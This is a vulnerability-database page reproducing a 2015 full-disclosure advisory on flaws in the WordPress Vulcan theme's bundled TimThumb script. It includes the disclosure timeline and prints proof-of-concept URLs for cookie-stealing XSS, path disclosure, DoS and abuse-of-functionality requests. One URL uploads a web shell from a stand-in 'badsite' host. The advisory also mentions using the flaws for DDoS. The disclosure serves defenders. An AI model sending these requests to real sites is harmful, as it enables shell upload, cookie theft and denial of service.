Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Vulcan Theme XSS / Disclosure/ DoS

🗓️ 06 Jul 2015 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Vulnerabilities in commercial WordPress Vulcan theme: Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload

Code
`Hello list!  
  
Let's back to vulnerabilities, which I disclosed in April 2011, which can be   
used for DDoS attacks on other sites, e.g. with my DAVOSET   
(http://seclists.org/fulldisclosure/2015/Jun/111). In addition to hundreds   
of themes, which I wrote about in previous years, here is another theme for   
WordPress, which still didn't fix all holes and there are many sites with   
old version of theme (+ WAF bypass).  
  
I want to warn you about multiple vulnerabilities in Vulcan theme for   
WordPress. This is commercial theme for WP.  
  
These are Cross-Site Scripting, Full path disclosure, Abuse of   
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.  
  
In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of   
Functionality and Denial of Service vulnerabilities in TimThumb and multiple   
themes for WordPress (http://seclists.org/fulldisclosure/2011/Apr/227), and   
later also was disclosed Arbitrary File Uploading vulnerability.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of Vulcan theme for WordPress (in last versions   
there were fixed only vulnerabilities in TimThumb, but there are still FPD   
in other php-files).  
  
Since version TimThumb 2.8 all vulnerabilities are fixed (in timthumb.php).   
But AoF and DoS holes are fixed by disabling external hosts by default. If   
to change settings (to allow individual or all external hosts), which is   
allowed by software, then it's possible to conduct attacks on other sites.   
E.g. with using of DAVOSET.  
  
WAF bypass:  
  
At many sites unfixed version of TimThumb in theme is used, but they protect   
themselves using WAF (such as ModSecurity). Note, that WAF doesn't protect   
against FPD holes in this theme and TimThumb, and in some cases it doesn't   
protect against AoF and DoS.  
  
----------  
Details:  
----------  
  
XSS (WASC-08) (in old versions TimThumb):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=1  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1  
  
Abuse of Functionality (WASC-42):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1   
(bypass of restriction on domain, if such restriction is turned on)  
  
DoS (WASC-10):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1   
(bypass of restriction on domain, if such restriction is turned on)  
  
About such Abuse of Functionality and Denial of Service vulnerabilities you   
can read in my article Using of the sites for attacks on other sites   
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).  
  
Arbitrary File Upload (WASC-31) (in old versions of TimThumb):  
  
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/themes/vulcan/  
  
Besides index.php there are also potentially FPD in other php-files of this   
theme.  
  
------------  
Timeline:  
------------  
  
2011.02.01 - informed developers from WooThemes about holes in their themes.  
2011.02.04-12 - conversation about fixing holes in all their themes for WP.  
2011.02.07 - announced at my site.  
2011.02.08 - informed developer of TimThumb.  
2011.02.13 - developer of TimThumb released version 1.25.  
2011.02.13 - developers from WooThemes begun updating TimThumb in all their   
themes.  
2011.04.13 - disclosed at my site about TimThumb and multiple themes.  
2015.07.02 - disclosed at my site about Vulcan theme.  
  
I mentioned about these vulnerabilities at my site   
(http://websecurity.com.ua/7850/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jul 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
wordpressvulcan themecross-site scriptingfull path disclosureabuse of functionalitydenial of servicearbitrary file uploadddos attackstimthumbwaf bypassvulnerabilitiessecurity disclosure
25